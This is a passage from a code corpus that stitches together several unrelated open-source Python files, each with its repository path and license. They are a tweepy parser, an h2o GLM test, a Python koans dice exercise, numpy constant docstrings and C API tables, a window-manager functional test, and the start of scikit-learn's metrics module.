def parse(self, method, payload):
try:
json = self.json_lib.loads(payload)
except Exception, e:
raise TweepError('Failed to parse JSON payload: %s' % e)
needsCursors = method.parameters.has_key('cursor')
if needsCursors and isinstance(json, dict) and 'previous_cursor' in json and 'next_cursor' in json:
cursors = json['previous_cursor'], json['next_cursor']
return json, cursors
else:
return json
def parse_error(self, payload):
error = self.json_lib.loads(payload)
if error.has_key('error'):
return error['error']
else:
return error['errors']
class ModelParser(JSONParser):
def __init__(self, model_factory=None):
JSONParser.__init__(self)
self.model_factory = model_factory or ModelFactory
def parse(self, method, payload):
try:
if method.payload_type is None: return
model = getattr(self.model_factory, method.payload_type)
except AttributeError:
raise TweepError('No model for this payload type: %s' % method.payload_type)
json = JSONParser.parse(self, method, payload)
if isinstance(json, tuple):
json, cursors = json
else:
cursors = None
if method.payload_list:
result = model.parse_list(method.api, json)
else:
result = model.parse(method.api, json)
if cursors:
return result, cursors
else:
return result
|
mit
|
h2oai/h2o
|
py/testdir_single_jvm/notest_GLM2_weight_nan_fail.py
|
9
|
1512
|
import unittest, random, sys, time
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_glm, h2o_import as h2i
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global SEED
SEED = h2o.setup_random_seed()
h2o.init()
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_NOPASS_GLM2_weight_nan_fail(self):
csvPathname = 'covtype/covtype.20k.data'
hex_key = 'covtype.20k.hex'
parseResult = h2i.import_parse(bucket='smalldata', path=csvPathname, hex_key=hex_key, schema='put')
kwargs = {
'destination_key': 'GLM_model_python_0_default_0',
'family': 'tweedie',
'tweedie_variance_power': 1.9999999,
'max_iter': 10,
'alpha': 0,
'lambda': 0,
'response': 54,
}
for trial in range(3):
# params is mutable. This is default.
start = time.time()
glm = h2o_cmd.runGLM(timeoutSecs=70, parseResult=parseResult, **kwargs)
h2o.check_sandbox_for_errors()
# pass the kwargs with all the params, so we know what we asked for!
h2o_glm.simpleCheckGLM(self, glm, None, **kwargs)
print "glm end on ", csvPathname, 'took', time.time() - start, 'seconds'
print "Trial #", trial, "completed\n"
if __name__ == '__main__':
h2o.unit_main()
|
apache-2.0
|
GGXH/python_koans
|
python_koans/python2/koans/about_dice_project.py
|
94
|
1895
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
import random
class DiceSet(object):
def __init__(self):
self._values = None
@property
def values(self):
return self._values
def roll(self, n):
# Needs implementing!
# Tip: random.randint(min, max) can be used to generate random numbers
pass
class AboutDiceProject(Koan):
def test_can_create_a_dice_set(self):
dice = DiceSet()
self.assertTrue(dice)
def test_rolling_the_dice_returns_a_set_of_integers_between_1_and_6(self):
dice = DiceSet()
dice.roll(5)
self.assertTrue(isinstance(dice.values, list), "should be a list")
self.assertEqual(5, len(dice.values))
for value in dice.values:
self.assertTrue(
value >= 1 and value <= 6,
"value " + str(value) + " must be between 1 and 6")
def test_dice_values_do_not_change_unless_explicitly_rolled(self):
dice = DiceSet()
dice.roll(5)
first_time = dice.values
second_time = dice.values
self.assertEqual(first_time, second_time)
def test_dice_values_should_change_between_rolls(self):
dice = DiceSet()
dice.roll(5)
first_time = dice.values
dice.roll(5)
second_time = dice.values
self.assertNotEqual(first_time, second_time, \
"Two rolls should not be equal")
# THINK ABOUT IT:
#
# If the rolls are random, then it is possible (although not
# likely) that two consecutive rolls are equal. What would be a
# better way to test this?
def test_you_can_roll_different_numbers_of_dice(self):
dice = DiceSet()
dice.roll(3)
self.assertEqual(3, len(dice.values))
dice.roll(1)
self.assertEqual(1, len(dice.values))
|
mit
|
pelson/numpy
|
numpy/doc/constants.py
|
94
|
8888
|
"""
=========
Constants
=========
Numpy includes several constants:
%(constant_list)s
"""
#
# Note: the docstring is autogenerated.
#
import textwrap, re
# Maintain same format as in numpy.add_newdocs
constants = []
def add_newdoc(module, name, doc):
constants.append((name, doc))
add_newdoc('numpy', 'Inf',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
add_newdoc('numpy', 'Infinity',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
add_newdoc('numpy', 'NAN',
"""
IEEE 754 floating point representation of Not a Number (NaN).
`NaN` and `NAN` are equivalent definitions of `nan`. Please use
`nan` instead of `NAN`.
See Also
--------
nan
""")
add_newdoc('numpy', 'NINF',
"""
IEEE 754 floating point representation of negative infinity.
Returns
-------
y : float
A floating point representation of negative infinity.
See Also
--------
isinf : Shows which elements are positive or negative infinity
isposinf : Shows which elements are positive infinity
isneginf : Shows which elements are negative infinity
isnan : Shows which elements are Not a Number
isfinite : Shows which elements are finite (not one of Not a Number,
positive infinity and negative infinity)
Notes
-----
Numpy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). This means that Not a Number is not equivalent to infinity.
Also that positive infinity is not equivalent to negative infinity. But
infinity is equivalent to positive infinity.
Examples
--------
>>> np.NINF
-inf
>>> np.log(0)
-inf
""")
add_newdoc('numpy', 'NZERO',
"""
IEEE 754 floating point representation of negative zero.
Returns
-------
y : float
A floating point representation of negative zero.
See Also
--------
PZERO : Defines positive zero.
isinf : Shows which elements are positive or negative infinity.
isposinf : Shows which elements are positive infinity.
isneginf : Shows which elements are negative infinity.
isnan : Shows which elements are Not a Number.
isfinite : Shows which elements are finite - not one of
Not a Number, positive infinity and negative infinity.
Notes
-----
Numpy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). Negative zero is considered to be a finite number.
Examples
--------
>>> np.NZERO
-0.0
>>> np.PZERO
0.0
>>> np.isfinite([np.NZERO])
array([ True], dtype=bool)
>>> np.isnan([np.NZERO])
array([False], dtype=bool)
>>> np.isinf([np.NZERO])
array([False], dtype=bool)
""")
add_newdoc('numpy', 'NaN',
"""
IEEE 754 floating point representation of Not a Number (NaN).
`NaN` and `NAN` are equivalent definitions of `nan`. Please use
`nan` instead of `NaN`.
See Also
--------
nan
""")
add_newdoc('numpy', 'PINF',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
add_newdoc('numpy', 'PZERO',
"""
IEEE 754 floating point representation of positive zero.
Returns
-------
y : float
A floating point representation of positive zero.
See Also
--------
NZERO : Defines negative zero.
isinf : Shows which elements are positive or negative infinity.
isposinf : Shows which elements are positive infinity.
isneginf : Shows which elements are negative infinity.
isnan : Shows which elements are Not a Number.
isfinite : Shows which elements are finite - not one of
Not a Number, positive infinity and negative infinity.
Notes
-----
Numpy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). Positive zero is considered to be a finite number.
Examples
--------
>>> np.PZERO
0.0
>>> np.NZERO
-0.0
>>> np.isfinite([np.PZERO])
array([ True], dtype=bool)
>>> np.isnan([np.PZERO])
array([False], dtype=bool)
>>> np.isinf([np.PZERO])
array([False], dtype=bool)
""")
add_newdoc('numpy', 'e',
"""
Euler's constant, base of natural logarithms, Napier's constant.
``e = 2.71828182845904523536028747135266249775724709369995...``
See Also
--------
exp : Exponential function
log : Natural logarithm
References
----------
.. [1] http://en.wikipedia.org/wiki/Napier_constant
""")
add_newdoc('numpy', 'inf',
"""
IEEE 754 floating point representation of (positive) infinity.
Returns
-------
y : float
A floating point representation of positive infinity.
See Also
--------
isinf : Shows which elements are positive or negative infinity
isposinf : Shows which elements are positive infinity
isneginf : Shows which elements are negative infinity
isnan : Shows which elements are Not a Number
isfinite : Shows which elements are finite (not one of Not a Number,
positive infinity and negative infinity)
Notes
-----
Numpy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). This means that Not a Number is not equivalent to infinity.
Also that positive infinity is not equivalent to negative infinity. But
infinity is equivalent to positive infinity.
`Inf`, `Infinity`, `PINF` and `infty` are aliases for `inf`.
Examples
--------
>>> np.inf
inf
>>> np.array([1]) / 0.
array([ Inf])
""")
add_newdoc('numpy', 'infty',
"""
IEEE 754 floating point representation of (positive) infinity.
Use `inf` because `Inf`, `Infinity`, `PINF` and `infty` are aliases for
`inf`. For more details, see `inf`.
See Also
--------
inf
""")
add_newdoc('numpy', 'nan',
"""
IEEE 754 floating point representation of Not a Number (NaN).
Returns
-------
y : A floating point representation of Not a Number.
See Also
--------
isnan : Shows which elements are Not a Number.
isfinite : Shows which elements are finite (not one of
Not a Number, positive infinity and negative infinity)
Notes
-----
Numpy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). This means that Not a Number is not equivalent to infinity.
`NaN` and `NAN` are aliases of `nan`.
Examples
--------
>>> np.nan
nan
>>> np.log(-1)
nan
>>> np.log([-1, 1, 2])
array([ NaN, 0. , 0.69314718])
""")
add_newdoc('numpy', 'newaxis',
"""
A convenient alias for None, useful for indexing arrays.
See Also
--------
`numpy.doc.indexing`
Examples
--------
>>> newaxis is None
True
>>> x = np.arange(3)
>>> x
array([0, 1, 2])
>>> x[:, newaxis]
array([[0],
[1],
[2]])
>>> x[:, newaxis, newaxis]
array([[[0]],
[[1]],
[[2]]])
>>> x[:, newaxis] * x
array([[0, 0, 0],
[0, 1, 2],
[0, 2, 4]])
Outer product, same as ``outer(x, y)``:
>>> y = np.arange(3, 6)
>>> x[:, newaxis] * y
array([[ 0, 0, 0],
[ 3, 4, 5],
[ 6, 8, 10]])
``x[newaxis, :]`` is equivalent to ``x[newaxis]`` and ``x[None]``:
>>> x[newaxis, :].shape
(1, 3)
>>> x[newaxis].shape
(1, 3)
>>> x[None].shape
(1, 3)
>>> x[:, newaxis].shape
(3, 1)
""")
if __doc__:
constants_str = []
constants.sort()
for name, doc in constants:
s = textwrap.dedent(doc).replace("\n", "\n ")
# Replace sections by rubrics
lines = s.split("\n")
new_lines = []
for line in lines:
m = re.match(r'^(\s+)[-=]+\s*$', line)
if m and new_lines:
prev = textwrap.dedent(new_lines.pop())
new_lines.append('%s.. rubric:: %s' % (m.group(1), prev))
new_lines.append('')
else:
new_lines.append(line)
s = "\n".join(new_lines)
# Done.
constants_str.append(""".. const:: %s\n %s""" % (name, s))
constants_str = "\n".join(constants_str)
__doc__ = __doc__ % dict(constant_list=constants_str)
del constants_str, name, doc
del line, lines, new_lines, m, s, prev
del constants, add_newdoc
|
bsd-3-clause
|
numpy/numpy
|
numpy/core/code_generators/numpy_api.py
|
11
|
20211
|
"""Here we define the exported functions, types, etc... which need to be
exported through a global C pointer.
Each dictionary contains name -> index pair.
Whenever you change one index, you break the ABI (and the ABI version number
should be incremented). Whenever you add an item to one of the dict, the API
needs to be updated in both setup_common.py and by adding an appropriate
entry to cversion.txt (generate the hash via "python cversions.py").
When adding a function, make sure to use the next integer not used as an index
(in case you use an existing index or jump, the build will stop and raise an
exception, so it should hopefully not get unnoticed).
"""
from code_generators.genapi import StealRef, NonNull
# index, type
multiarray_global_vars = {
'NPY_NUMUSERTYPES': (7, 'int'),
'NPY_DEFAULT_ASSIGN_CASTING': (292, 'NPY_CASTING'),
}
multiarray_scalar_bool_values = {
'_PyArrayScalar_BoolValues': (9,)
}
# index, annotations
# please mark functions that have been checked to not need any annotations
multiarray_types_api = {
'PyBigArray_Type': (1,),
'PyArray_Type': (2,),
# Internally, PyArrayDescr_Type is a PyArray_DTypeMeta,
# the following also defines PyArrayDescr_TypeFull (Full appended)
'PyArrayDescr_Type': (3, "PyArray_DTypeMeta"),
'PyArrayFlags_Type': (4,),
'PyArrayIter_Type': (5,),
'PyArrayMultiIter_Type': (6,),
'PyBoolArrType_Type': (8,),
'PyGenericArrType_Type': (10,),
'PyNumberArrType_Type': (11,),
'PyIntegerArrType_Type': (12,),
'PySignedIntegerArrType_Type': (13,),
'PyUnsignedIntegerArrType_Type': (14,),
'PyInexactArrType_Type': (15,),
'PyFloatingArrType_Type': (16,),
'PyComplexFloatingArrType_Type': (17,),
'PyFlexibleArrType_Type': (18,),
'PyCharacterArrType_Type': (19,),
'PyByteArrType_Type': (20,),
'PyShortArrType_Type': (21,),
'PyIntArrType_Type': (22,),
'PyLongArrType_Type': (23,),
'PyLongLongArrType_Type': (24,),
'PyUByteArrType_Type': (25,),
'PyUShortArrType_Type': (26,),
'PyUIntArrType_Type': (27,),
'PyULongArrType_Type': (28,),
'PyULongLongArrType_Type': (29,),
'PyFloatArrType_Type': (30,),
'PyDoubleArrType_Type': (31,),
'PyLongDoubleArrType_Type': (32,),
'PyCFloatArrType_Type': (33,),
'PyCDoubleArrType_Type': (34,),
'PyCLongDoubleArrType_Type': (35,),
'PyObjectArrType_Type': (36,),
'PyStringArrType_Type': (37,),
'PyUnicodeArrType_Type': (38,),
'PyVoidArrType_Type': (39,),
# End 1.5 API
'PyTimeIntegerArrType_Type': (214,),
'PyDatetimeArrType_Type': (215,),
'PyTimedeltaArrType_Type': (216,),
'PyHalfArrType_Type': (217,),
'NpyIter_Type': (218,),
# End 1.6 API
}
#define NPY_NUMUSERTYPES (*(int *)PyArray_API[6])
#define PyBoolArrType_Type (*(PyTypeObject *)PyArray_API[7])
#define _PyArrayScalar_BoolValues ((PyBoolScalarObject *)PyArray_API[8])
multiarray_funcs_api = {
'PyArray_GetNDArrayCVersion': (0,),
'PyArray_SetNumericOps': (40,),
'PyArray_GetNumericOps': (41,),
'PyArray_INCREF': (42,),
'PyArray_XDECREF': (43,),
'PyArray_SetStringFunction': (44,),
'PyArray_DescrFromType': (45,),
'PyArray_TypeObjectFromType': (46,),
'PyArray_Zero': (47,),
'PyArray_One': (48,),
'PyArray_CastToType': (49, StealRef(2), NonNull(2)),
'PyArray_CastTo': (50,),
'PyArray_CastAnyTo': (51,),
'PyArray_CanCastSafely': (52,),
'PyArray_CanCastTo': (53,),
'PyArray_ObjectType': (54,),
'PyArray_DescrFromObject': (55,),
'PyArray_ConvertToCommonType': (56,),
'PyArray_DescrFromScalar': (57,),
'PyArray_DescrFromTypeObject': (58,),
'PyArray_Size': (59,),
'PyArray_Scalar': (60,),
'PyArray_FromScalar': (61, StealRef(2)),
'PyArray_ScalarAsCtype': (62,),
'PyArray_CastScalarToCtype': (63,),
'PyArray_CastScalarDirect': (64,),
'PyArray_ScalarFromObject': (65,),
'PyArray_GetCastFunc': (66,),
'PyArray_FromDims': (67,),
'PyArray_FromDimsAndDataAndDescr': (68, StealRef(3)),
'PyArray_FromAny': (69, StealRef(2)),
'PyArray_EnsureArray': (70, StealRef(1)),
'PyArray_EnsureAnyArray': (71, StealRef(1)),
'PyArray_FromFile': (72,),
'PyArray_FromString': (73,),
'PyArray_FromBuffer': (74,),
'PyArray_FromIter': (75, StealRef(2)),
'PyArray_Return': (76, StealRef(1)),
'PyArray_GetField': (77, StealRef(2), NonNull(2)),
'PyArray_SetField': (78, StealRef(2), NonNull(2)),
'PyArray_Byteswap': (79,),
'PyArray_Resize': (80,),
'PyArray_MoveInto': (81,),
'PyArray_CopyInto': (82,),
'PyArray_CopyAnyInto': (83,),
'PyArray_CopyObject': (84,),
'PyArray_NewCopy': (85, NonNull(1)),
'PyArray_ToList': (86,),
'PyArray_ToString': (87,),
'PyArray_ToFile': (88,),
'PyArray_Dump': (89,),
'PyArray_Dumps': (90,),
'PyArray_ValidType': (91,),
'PyArray_UpdateFlags': (92,),
'PyArray_New': (93, NonNull(1)),
'PyArray_NewFromDescr': (94, StealRef(2), NonNull([1, 2])),
'PyArray_DescrNew': (95,),
'PyArray_DescrNewFromType': (96,),
'PyArray_GetPriority': (97,),
'PyArray_IterNew': (98,),
'PyArray_MultiIterNew': (99,),
'PyArray_PyIntAsInt': (100,),
'PyArray_PyIntAsIntp': (101,),
'PyArray_Broadcast': (102,),
'PyArray_FillObjectArray': (103,),
'PyArray_FillWithScalar': (104,),
'PyArray_CheckStrides': (105,),
'PyArray_DescrNewByteorder': (106,),
'PyArray_IterAllButAxis': (107,),
'PyArray_CheckFromAny': (108, StealRef(2)),
'PyArray_FromArray': (109, StealRef(2)),
'PyArray_FromInterface': (110,),
'PyArray_FromStructInterface': (111,),
'PyArray_FromArrayAttr': (112,),
'PyArray_ScalarKind': (113,),
'PyArray_CanCoerceScalar': (114,),
'PyArray_NewFlagsObject': (115,),
'PyArray_CanCastScalar': (116,),
'PyArray_CompareUCS4': (117,),
'PyArray_RemoveSmallest': (118,),
'PyArray_ElementStrides': (119,),
'PyArray_Item_INCREF': (120,),
'PyArray_Item_XDECREF': (121,),
'PyArray_FieldNames': (122,),
'PyArray_Transpose': (123,),
'PyArray_TakeFrom': (124,),
'PyArray_PutTo': (125,),
'PyArray_PutMask': (126,),
'PyArray_Repeat': (127,),
'PyArray_Choose': (128,),
'PyArray_Sort': (129,),
'PyArray_ArgSort': (130,),
'PyArray_SearchSorted': (131,),
'PyArray_ArgMax': (132,),
'PyArray_ArgMin': (133,),
'PyArray_Reshape': (134,),
'PyArray_Newshape': (135,),
'PyArray_Squeeze': (136,),
'PyArray_View': (137, StealRef(2)),
'PyArray_SwapAxes': (138,),
'PyArray_Max': (139,),
'PyArray_Min': (140,),
'PyArray_Ptp': (141,),
'PyArray_Mean': (142,),
'PyArray_Trace': (143,),
'PyArray_Diagonal': (144,),
'PyArray_Clip': (145,),
'PyArray_Conjugate': (146,),
'PyArray_Nonzero': (147,),
'PyArray_Std': (148,),
'PyArray_Sum': (149,),
'PyArray_CumSum': (150,),
'PyArray_Prod': (151,),
'PyArray_CumProd': (152,),
'PyArray_All': (153,),
'PyArray_Any': (154,),
'PyArray_Compress': (155,),
'PyArray_Flatten': (156,),
'PyArray_Ravel': (157,),
'PyArray_MultiplyList': (158,),
'PyArray_MultiplyIntList': (159,),
'PyArray_GetPtr': (160,),
'PyArray_CompareLists': (161,),
'PyArray_AsCArray': (162, StealRef(5)),
'PyArray_As1D': (163,),
'PyArray_As2D': (164,),
'PyArray_Free': (165,),
'PyArray_Converter': (166,),
'PyArray_IntpFromSequence': (167,),
'PyArray_Concatenate': (168,),
'PyArray_InnerProduct': (169,),
'PyArray_MatrixProduct': (170,),
'PyArray_CopyAndTranspose': (171,),
'PyArray_Correlate': (172,),
'PyArray_TypestrConvert': (173,),
'PyArray_DescrConverter': (174,),
'PyArray_DescrConverter2': (175,),
'PyArray_IntpConverter': (176,),
'PyArray_BufferConverter': (177,),
'PyArray_AxisConverter': (178,),
'PyArray_BoolConverter': (179,),
'PyArray_ByteorderConverter': (180,),
'PyArray_OrderConverter': (181,),
'PyArray_EquivTypes': (182,),
'PyArray_Zeros': (183, StealRef(3)),
'PyArray_Empty': (184, StealRef(3)),
'PyArray_Where': (185,),
'PyArray_Arange': (186,),
'PyArray_ArangeObj': (187,),
'PyArray_SortkindConverter': (188,),
'PyArray_LexSort': (189,),
'PyArray_Round': (190,),
'PyArray_EquivTypenums': (191,),
'PyArray_RegisterDataType': (192,),
'PyArray_RegisterCastFunc': (193,),
'PyArray_RegisterCanCast': (194,),
'PyArray_InitArrFuncs': (195,),
'PyArray_IntTupleFromIntp': (196,),
'PyArray_TypeNumFromName': (197,),
'PyArray_ClipmodeConverter': (198,),
'PyArray_OutputConverter': (199,),
'PyArray_BroadcastToShape': (200,),
'_PyArray_SigintHandler': (201,),
'_PyArray_GetSigintBuf': (202,),
'PyArray_DescrAlignConverter': (203,),
'PyArray_DescrAlignConverter2': (204,),
'PyArray_SearchsideConverter': (205,),
'PyArray_CheckAxis': (206,),
'PyArray_OverflowMultiplyList': (207,),
'PyArray_CompareString': (208,),
'PyArray_MultiIterFromObjects': (209,),
'PyArray_GetEndianness': (210,),
'PyArray_GetNDArrayCFeatureVersion': (211,),
'PyArray_Correlate2': (212,),
'PyArray_NeighborhoodIterNew': (213,),
# End 1.5 API
'PyArray_SetDatetimeParseFunction': (219,),
'PyArray_DatetimeToDatetimeStruct': (220,),
'PyArray_TimedeltaToTimedeltaStruct': (221,),
'PyArray_DatetimeStructToDatetime': (222,),
'PyArray_TimedeltaStructToTimedelta': (223,),
# NDIter API
'NpyIter_New': (224,),
'NpyIter_MultiNew': (225,),
'NpyIter_AdvancedNew': (226,),
'NpyIter_Copy': (227,),
'NpyIter_Deallocate': (228,),
'NpyIter_HasDelayedBufAlloc': (229,),
'NpyIter_HasExternalLoop': (230,),
'NpyIter_EnableExternalLoop': (231,),
'NpyIter_GetInnerStrideArray': (232,),
'NpyIter_GetInnerLoopSizePtr': (233,),
'NpyIter_Reset': (234,),
'NpyIter_ResetBasePointers': (235,),
'NpyIter_ResetToIterIndexRange': (236,),
'NpyIter_GetNDim': (237,),
'NpyIter_GetNOp': (238,),
'NpyIter_GetIterNext': (239,),
'NpyIter_GetIterSize': (240,),
'NpyIter_GetIterIndexRange': (241,),
'NpyIter_GetIterIndex': (242,),
'NpyIter_GotoIterIndex': (243,),
'NpyIter_HasMultiIndex': (244,),
'NpyIter_GetShape': (245,),
'NpyIter_GetGetMultiIndex': (246,),
'NpyIter_GotoMultiIndex': (247,),
'NpyIter_RemoveMultiIndex': (248,),
'NpyIter_HasIndex': (249,),
'NpyIter_IsBuffered': (250,),
'NpyIter_IsGrowInner': (251,),
'NpyIter_GetBufferSize': (252,),
'NpyIter_GetIndexPtr': (253,),
'NpyIter_GotoIndex': (254,),
'NpyIter_GetDataPtrArray': (255,),
'NpyIter_GetDescrArray': (256,),
'NpyIter_GetOperandArray': (257,),
'NpyIter_GetIterView': (258,),
'NpyIter_GetReadFlags': (259,),
'NpyIter_GetWriteFlags': (260,),
'NpyIter_DebugPrint': (261,),
'NpyIter_IterationNeedsAPI': (262,),
'NpyIter_GetInnerFixedStrideArray': (263,),
'NpyIter_RemoveAxis': (264,),
'NpyIter_GetAxisStrideArray': (265,),
'NpyIter_RequiresBuffering': (266,),
'NpyIter_GetInitialDataPtrArray': (267,),
'NpyIter_CreateCompatibleStrides': (268,),
#
'PyArray_CastingConverter': (269,),
'PyArray_CountNonzero': (270,),
'PyArray_PromoteTypes': (271,),
'PyArray_MinScalarType': (272,),
'PyArray_ResultType': (273,),
'PyArray_CanCastArrayTo': (274,),
'PyArray_CanCastTypeTo': (275,),
'PyArray_EinsteinSum': (276,),
'PyArray_NewLikeArray': (277, StealRef(3), NonNull(1)),
'PyArray_GetArrayParamsFromObject': (278,),
'PyArray_ConvertClipmodeSequence': (279,),
'PyArray_MatrixProduct2': (280,),
# End 1.6 API
'NpyIter_IsFirstVisit': (281,),
'PyArray_SetBaseObject': (282, StealRef(2)),
'PyArray_CreateSortedStridePerm': (283,),
'PyArray_RemoveAxesInPlace': (284,),
'PyArray_DebugPrint': (285,),
'PyArray_FailUnlessWriteable': (286,),
'PyArray_SetUpdateIfCopyBase': (287, StealRef(2)),
'PyDataMem_NEW': (288,),
'PyDataMem_FREE': (289,),
'PyDataMem_RENEW': (290,),
'PyDataMem_SetEventHook': (291,),
'PyArray_MapIterSwapAxes': (293,),
'PyArray_MapIterArray': (294,),
'PyArray_MapIterNext': (295,),
# End 1.7 API
'PyArray_Partition': (296,),
'PyArray_ArgPartition': (297,),
'PyArray_SelectkindConverter': (298,),
'PyDataMem_NEW_ZEROED': (299,),
# End 1.8 API
# End 1.9 API
'PyArray_CheckAnyScalarExact': (300, NonNull(1)),
# End 1.10 API
'PyArray_MapIterArrayCopyIfOverlap': (301,),
# End 1.13 API
'PyArray_ResolveWritebackIfCopy': (302,),
'PyArray_SetWritebackIfCopyBase': (303,),
# End 1.14 API
}
ufunc_types_api = {
'PyUFunc_Type': (0,)
}
ufunc_funcs_api = {
'PyUFunc_FromFuncAndData': (1,),
'PyUFunc_RegisterLoopForType': (2,),
'PyUFunc_GenericFunction': (3,),
'PyUFunc_f_f_As_d_d': (4,),
'PyUFunc_d_d': (5,),
'PyUFunc_f_f': (6,),
'PyUFunc_g_g': (7,),
'PyUFunc_F_F_As_D_D': (8,),
'PyUFunc_F_F': (9,),
'PyUFunc_D_D': (10,),
'PyUFunc_G_G': (11,),
'PyUFunc_O_O': (12,),
'PyUFunc_ff_f_As_dd_d': (13,),
'PyUFunc_ff_f': (14,),
'PyUFunc_dd_d': (15,),
'PyUFunc_gg_g': (16,),
'PyUFunc_FF_F_As_DD_D': (17,),
'PyUFunc_DD_D': (18,),
'PyUFunc_FF_F': (19,),
'PyUFunc_GG_G': (20,),
'PyUFunc_OO_O': (21,),
'PyUFunc_O_O_method': (22,),
'PyUFunc_OO_O_method': (23,),
'PyUFunc_On_Om': (24,),
'PyUFunc_GetPyValues': (25,),
'PyUFunc_checkfperr': (26,),
'PyUFunc_clearfperr': (27,),
'PyUFunc_getfperr': (28,),
'PyUFunc_handlefperr': (29,),
'PyUFunc_ReplaceLoopBySignature': (30,),
'PyUFunc_FromFuncAndDataAndSignature': (31,),
'PyUFunc_SetUsesArraysAsData': (32,),
# End 1.5 API
'PyUFunc_e_e': (33,),
'PyUFunc_e_e_As_f_f': (34,),
'PyUFunc_e_e_As_d_d': (35,),
'PyUFunc_ee_e': (36,),
'PyUFunc_ee_e_As_ff_f': (37,),
'PyUFunc_ee_e_As_dd_d': (38,),
# End 1.6 API
'PyUFunc_DefaultTypeResolver': (39,),
'PyUFunc_ValidateCasting': (40,),
# End 1.7 API
'PyUFunc_RegisterLoopForDescr': (41,),
# End 1.8 API
'PyUFunc_FromFuncAndDataAndSignatureAndIdentity': (42,),
# End 1.16 API
}
# List of all the dicts which define the C API
# XXX: DO NOT CHANGE THE ORDER OF TUPLES BELOW !
multiarray_api = (
multiarray_global_vars,
multiarray_scalar_bool_values,
multiarray_types_api,
multiarray_funcs_api,
)
ufunc_api = (
ufunc_funcs_api,
ufunc_types_api
)
full_api = multiarray_api + ufunc_api
|
bsd-3-clause
|
nemomobile-graveyard/mcompositor
|
tests/functional/test19.py
|
4
|
1948
|
#!/usr/bin/python
# Check that initial_state==IconicState windows can be raised/activated.
#* Test steps
# * show an initial_state==IconicState application window
# * activate it
# * check that it's on top
# * close it
# * show an initial_state==IconicState application window
# * raise it
#* Post-conditions
# * check that it's on top
import os, re, sys, time
if os.system('mcompositor-test-init.py'):
sys.exit(1)
fd = os.popen('windowstack m')
s = fd.read(5000)
win_re = re.compile('^0x[0-9a-f]+')
home_win = 0
for l in s.splitlines():
if re.search(' DESKTOP viewable ', l.strip()):
home_win = win_re.match(l.strip()).group()
if home_win == 0:
print 'FAIL: desktop window not found'
sys.exit(1)
# create minimised application window
fd = os.popen('windowctl Ikn')
app_win = fd.readline().strip()
time.sleep(2)
# activate it
os.popen('windowctl A %s' % app_win)
time.sleep(2)
ret = 0
fd = os.popen('windowstack m')
s = fd.read(5000)
for l in s.splitlines():
if re.search("%s " % app_win, l.strip()):
print app_win, 'found'
break
elif re.search("%s " % home_win, l.strip()):
print 'FAIL: activation failed'
print 'Failed stack:\n', s
ret = 1
break
# close it
os.popen('pkill windowctl')
time.sleep(1)
# create minimised application window
fd = os.popen('windowctl Ikn')
app_win = fd.readline().strip()
time.sleep(2)
# raise it
os.popen('windowctl V %s None' % app_win)
time.sleep(2)
fd = os.popen('windowstack m')
s = fd.read(5000)
for l in s.splitlines():
if re.search("%s " % app_win, l.strip()):
print app_win, 'found'
break
elif re.search("%s " % home_win, l.strip()):
print 'FAIL: raising failed'
print 'Failed stack:\n', s
ret = 1
break
# cleanup
os.popen('pkill windowctl')
time.sleep(1)
if os.system('/usr/bin/gconftool-2 --type bool --set /desktop/meego/notifications/previews_enabled true'):
print 'cannot re-enable notifications'
sys.exit(ret)
|
lgpl-2.1
|
djgagne/scikit-learn
|
sklearn/metrics/__init__.py
|
214
|
3440
|
"""
The :mod:`sklearn.metrics` module includes score functions, performance metrics
and pairwise metrics and distance computations.
"""
from .ranking import auc
from .ranking import average_precision_score
from .ranking import coverage_error
from .ranking import label_ranking_average_precision_score
from .ranking import label_ranking_loss
from .ranking import precision_recall_curve
from .ranking import roc_auc_score
from .ranking import roc_curve
from .classification import accuracy_score
from .classification import classification_report
from .classification import cohen_kappa_score
from .classification import confusion_matrix
from .classification import f1_score
from .classification import fbeta_score
from .classification import hamming_loss
from .classification import hinge_loss
from .classification import jaccard_similarity_score
from .classification import log_loss
from .classification import matthews_corrcoef
from .classification import precision_recall_fscore_support
from .classification import precision_score
from .classification import recall_score
from .classification import zero_one_loss
from .classification import brier_score_loss
from . import cluster
from .cluster import adjusted_mutual_info_score
from .cluster import adjusted_rand_score
from .cluster import completeness_score
from .cluster import consensus_score
from .cluster import homogeneity_completeness_v_measure
from .cluster import homogeneity_score
from .cluster import mutual_info_score
from .cluster import normalized_mutual_info_score
from .cluster import silhouette_samples
from .cluster import silhouette_score
from .cluster import v_measure_score
from .pairwise import euclidean_distances
from .pairwise import pairwise_distances
from .pairwise import pairwise_distances_argmin
from .pairwise import pairwise_distances_argmin_min
from .pairwise import pairwise_kernels
from .regression import explained_variance_score
from .regression import mean_absolute_error
from .regression import mean_squared_error
from .regression import median_absolute_error
from .regression import r2_score
from .scorer import make_scorer
from .scorer import SCORERS
from .scorer import get_scorer
__all__ = [
'accuracy_score',
'adjusted_mutual_info_score',
'adjusted_rand_score',
'auc',
'average_precision_score',
'classification_report',
'cluster',
'completeness_score',
'confusion_matrix',
'consensus_score',
'coverage_error',
'euclidean_distances',
'explained_variance_score',
'f1_score',
'fbeta_score',
'get_scorer',
'hamming_loss',
'hinge_loss',
'homogeneity_completeness_v_measure',
'homogeneity_score',
'jaccard_similarity_score',
'label_ranking_average_precision_score',
'label_ranking_loss',
'log_loss',
'make_scorer',
'matthews_corrcoef',
'mean_absolute_error',
'mean_squared_error',
'median_absolute_error',
'mutual_info_score',
'normalized_mutual_info_score',
